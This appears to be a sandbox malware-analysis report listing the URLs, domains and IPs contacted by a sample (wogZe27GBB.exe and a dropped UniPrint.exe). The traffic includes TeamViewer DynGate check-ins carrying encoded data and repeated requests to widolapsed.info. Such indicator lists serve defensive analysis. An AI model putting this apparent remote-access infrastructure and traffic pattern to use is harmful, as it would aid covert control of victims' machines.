http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=100000020%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/80%Avira URL Cloudsafe
http://188.172.235.146/dout.aspx?s=12251267&p=10000001&client=DynGate0%Avira URL Cloudsafe
http://mastr13.teamv0%Avira URL Cloudsafe
http://188.172.235.146/dout.aspx?s=12251267&p=10000001&client=DynGatepzm0%Avira URL Cloudsafe
http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=100000010%Avira URL Cloudsafe
http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGate0%Avira URL Cloudsafe
http://go.teamviewer.comn00%Avira URL Cloudsafe
https://displaycatalog.m(0%Avira URL Cloudsafe
https://sectigo.com/CPS00%URL Reputationsafe
http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGatellow0%Avira URL Cloudsafe
https://widolapsed.info/0%Avira URL Cloudsafe
http://crl.verisign.corl00%Avira URL Cloudsafe
http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client0%Avira URL Cloudsafe
http://crl.ver)0%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/B0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
https://widolapsed.info/B8C631A8/(c~0%Avira URL Cloudsafe
https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
https://www.verisign.c0%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/0%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/ELBASE.dll.mui010%Avira URL Cloudsafe
https://widolapsed.info/apsed.info/qWave0%Avira URL Cloudsafe
http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000%Avira URL Cloudsafe
http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001K0%Avira URL Cloudsafe
http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002Z0%Avira URL Cloudsafe
http://crl.verisign.co0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
widolapsed.info
45.153.241.148
truefalse
    		high
    master13.teamviewer.com
    		185.188.32.23
    		truefalse
      		high
      ping3.dyngate.com
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001false
          		high
          http://master13.teamviewer.com/dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5MkoZ6YmBgcGRsZGpmckySiHpgTJqChnpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJqSiHpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJ6meq7S3GZcYmJMrHpialxgXGxwbkCipfalse
            		high
            http://master13.teamviewer.com/din.aspx?s=42047152&client=DynGate&p=10000002false
              		high
              http://master13.teamviewer.com/din.aspx?s=42047159&client=DynGate&p=10000002false
                		high
                http://master13.teamviewer.com/dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6sTY0saWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAH7LQs0qhaWs0MJjaOW1RZp/s+y/yn5XEbeVZg9sKBJ5zPw4VSW4zdwQ3dPOJPU35FNkIfcILZEzewXzbzR9HNSPt0dvZIMvjxebsFa8mt4yIfhUHNJCrU/eCKZvCgbkPO7XECRgFWPWpqy/DxavH2VA1uMNeC6MgWi1tqYJlUpUfalse
                  		high
                  http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002false
                  • Avira URL Cloud: safe
                  		unknown
                  http://master13.teamviewer.com/dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMlsrK4MLY0uzKemJMmMLczurCzsp61MJMmNLGytzmyqjy4Mp6YEyakoh6YPDKxsxoxMRwcsRmZG6+ZHJqbGhwYGxkbEyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpqTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCipfalse
                    		high
                    http://master13.teamviewer.com/dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pUfalse
                      		high
                      http://188.172.235.146/dout.aspx?s=12251267&p=10000001&client=DynGatefalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001false
                      • Avira URL Cloud: safe
                      		unknown
                      http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGatefalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001false
                        		high
                        http://master13.teamviewer.com/din.aspx?s=42047145&client=DynGate&p=10000002false
                          		high
                          https://widolapsed.info/B8C631A8/false
                          • Avira URL Cloud: safe
                          		unknown
                          http://master13.teamviewer.com/din.aspx?s=42047224&client=DynGate&p=10000002false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.teamviewer.com/download/version_4x/TeamViewerQS.exewogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                              		high
                              http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                		high
                                http://www.teamviewer.com/help/support.aspxKwogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                  		high
                                  https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campaiUniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000002.1073981229.0000000002740000.00000004.00000001.sdmpfalse
                                    		high
                                    https://widolapsed.info/apsed.info/B8C631A8/TTP-Out)LMEMXUniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002.UniPrint.exe, 00000005.00000003.1014947497.00000000057B2000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://ocsp.sectigo.com0wogZe27GBB.exefalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://master13.teamviewer.com/din.aspx?s=42047145&client=DynGate&p=10000002uUniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpfalse
                                      		high
                                      http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=100000023321935-2125563209-405306UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://corp.roblox.com/contact/svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmpfalse
                                        		high
                                        https://widolapsed.info/B8C631A8/.iUniPrint.exe, 00000005.00000003.855571733.00000000057D3000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGate:%UniPrint.exe, 00000005.00000002.1072952284.0000000000AE8000.00000004.00000020.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001ndows.PhotUniPrint.exe, 00000005.00000003.709879277.00000000057F0000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.teamviewer.com/download/version_5x/TeamViewerQS.exewogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                            		high
                                            http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#wogZe27GBB.exefalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://widolapsed.info/8C631A8/ELBASE.dll.mui01UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.TeamViewer.com/helpwogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                              		high
                                              http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=100000012UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://188.172.235.146/UniPrint.exe, 00000005.00000003.716845833.00000000057DB000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://188.172.235.146/EMUniPrint.exe, 00000005.00000003.716845833.00000000057DB000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.g5e.com/G5_End_User_License_Supplemental_Termssvchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmpfalse
                                                		high
                                                http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGateZUniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.TeamViewer.com/downloadwogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                                  		high
                                                  http://www.TeamViewer.comUniPrint.exe, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                                    		high
                                                    https://widolapsed.info/B8C631A8/8UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://mastr13.teamvUniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001sUniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://master13.teamviewer.com/din.aspx?s=42047159&client=DynGate&p=100000023vUniPrint.exe, 00000005.00000003.710194245.00000000057D4000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.TeamViewer.com#http://www.TeamViewer.com/licensingwogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                                          		high
                                                          http://www.teamviewer.com/ja/company/shutdown.aspx?version=UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://en.help.roblox.com/hc/en-ussvchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://188.172.235.146/dout.aspx?s=12251267&p=10000001&client=DynGatepzmUniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://master13.teamviewer.com/din.aspx?s=42047224&client=DynGate&p=10000002321935-2125563209-405306UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://mastr13.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=2UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://master13.teamviewer.com/dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5MkoUniPrint.exe, 00000005.00000002.1073179417.0000000000B68000.00000004.00000020.sdmpfalse
                                                                    		high
                                                                    http://go.teamviewer.comn0wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventuresvchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.teamviewer.com/help/connectivity.aspx:wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                                                        		high
                                                                        https://displaycatalog.m(svchost.exe, 00000010.00000003.794457434.00000217C6F81000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		low
                                                                        https://sectigo.com/CPS0wogZe27GBB.exefalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGatellowUniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://master13.teamviewer.com/din.aspx?s=42047152&client=DynGate&p=100000026UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.teamviewer.com/favicon.icowogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                                                            		high
                                                                            https://widolapsed.info/UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.roblox.com/developsvchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://crl.verisign.corl0UniPrint.exe, 0000000A.00000002.757533910.0000000000B88000.00000004.00000020.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://188.172.235.146/dout.aspx?s=12251267&p=10000002&clientUniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://crl.ver)svchost.exe, 00000010.00000002.817452731.00000217C68E9000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		low
                                                                              https://widolapsed.info/B8C631A8/BUniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0swogZe27GBB.exefalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://widolapsed.info/B8C631A8/(c~UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000010.00000003.797707479.00000217C6FB0000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.797621613.00000217C6F5E000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://nsis.sf.net/NSIS_ErrorErrorwogZe27GBB.exefalse
                                                                                		high
                                                                                https://corp.roblox.com/parents/svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://www.verisign.cUniPrint.exe, 00000005.00000002.1072984731.0000000000B00000.00000004.00000020.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.teamviewer.com/download/beta.aspxwogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                                                                    		high
                                                                                    http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                                                                      		high
                                                                                      http://www.teamviewer.comnsrC1CA.tmp.0.drfalse
                                                                                        		high
                                                                                        https://widolapsed.info/B8C631A8/ELBASE.dll.mui01UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.teamviewer.com/licensing/commercialuse.aspxwogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                                                                          		high
                                                                                          https://widolapsed.info/apsed.info/qWaveUniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://nsis.sf.net/NSIS_ErrorwogZe27GBB.exefalse
                                                                                            		high
                                                                                            http://master13.teamviewer.com/dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0sUniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001;UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=1000UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://www.roblox.com/info/privacysvchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.g5e.com/termsofservicesvchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.teamviewer.com/company/index.aspxwogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                                                                                      		high
                                                                                                      http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                                                                                        		high
                                                                                                        http://www.teamviewer.com/ja/company/shutdown.aspxwogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drfalse
                                                                                                          		high
                                                                                                          http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001KUniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002ZUniPrint.exe, 00000005.00000003.714775003.00000000057B2000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://crl.verisign.coUniPrint.exe, 0000000A.00000002.757533910.0000000000B88000.00000004.00000020.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://master13.teamviewer.com/dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6sUniPrint.exe, 00000005.00000002.1073127658.0000000000B5D000.00000004.00000020.sdmpfalse
                                                                                                            		high
